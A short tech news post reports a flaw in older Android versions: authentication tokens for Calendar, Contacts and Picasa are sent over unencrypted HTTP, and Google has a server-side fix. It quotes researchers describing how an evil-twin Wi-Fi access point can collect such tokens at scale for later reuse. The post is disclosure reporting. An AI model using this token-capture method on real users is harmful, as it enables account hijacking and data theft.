Bad news for Android users, and Google alike. Researchers in Germany have discovered a security flaw in Google’s Android OS. What’s more frightening is that, 99 percent of Android users are affected, as the flaw hits users who are presently on any version of the OS lower than the most recent 2.3.4. Yup, that means who doesn’t have an updated Nexus One or Nexus S. Sucks to be you bro.

The security flaw is from a lack of secure connection between Android and Google’s authentication system. When a user submits login credentials for Calendar or Contacts, Google returns an authentication token that’s sent over HTTP. That token can be used for 14 days for access to a user account. However, this doesn’t affect Android versions 3.0 or 2.3.4 as they use HTTPS for Calendar and Contacts. Picasa, however, remains transmitted insecurely, so those using Android 2.3.4 and above may still be affected slightly.

Researchers say that hackers can easy extract this information from an Android phone through the use of a fake, “dummy” wireless network that a user’s phone would try to connect itself to.

To collect such authTokens on a large scale an adversary could setup a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks. With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing. Due to the long lifetime of authTokens, the adversary can comfortably capture a large number of tokens and make use of them later on from a different location.

Of course, Google has already acknowledge the issue, and is able to implement a server side fix that should patch things up for Calendar and Contacts on all Android versions, though Picasa is still a question mark.

Today we’re starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days.

SOURCE via Computer World